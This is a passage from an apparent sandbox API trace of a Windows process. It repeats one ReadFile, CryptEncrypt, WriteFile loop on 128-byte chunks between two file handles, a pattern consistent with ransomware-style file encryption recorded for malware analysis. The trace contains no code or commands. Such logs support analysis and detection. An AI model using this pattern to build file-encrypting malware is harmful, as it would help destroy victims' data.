lpOverlapped=0x0) returned 1 [0042.080] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.080] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.080] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.080] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.080] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.081] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.081] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.081] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.081] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.081] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.081] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.081] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.081] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.081] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.081] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.082] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.082] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.082] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.082] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.082] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.082] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.082] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.082] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.082] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.082] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.082] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.082] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.082] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.082] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.082] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.082] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.082] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.082] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.082] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.082] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.082] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.082] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.082] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.083] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.083] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.083] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.083] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.083] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.083] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.083] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.083] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.083] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.083] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.083] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.083] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.083] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.083] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.083] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.083] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.083] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.083] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.084] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.084] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.084] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.084] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.084] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.084] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.084] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.084] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.084] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.084] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.084] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.084] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.084] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.084] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.084] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.084] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.084] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.084] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.084] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.084] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.085] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.085] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.085] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.085] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, 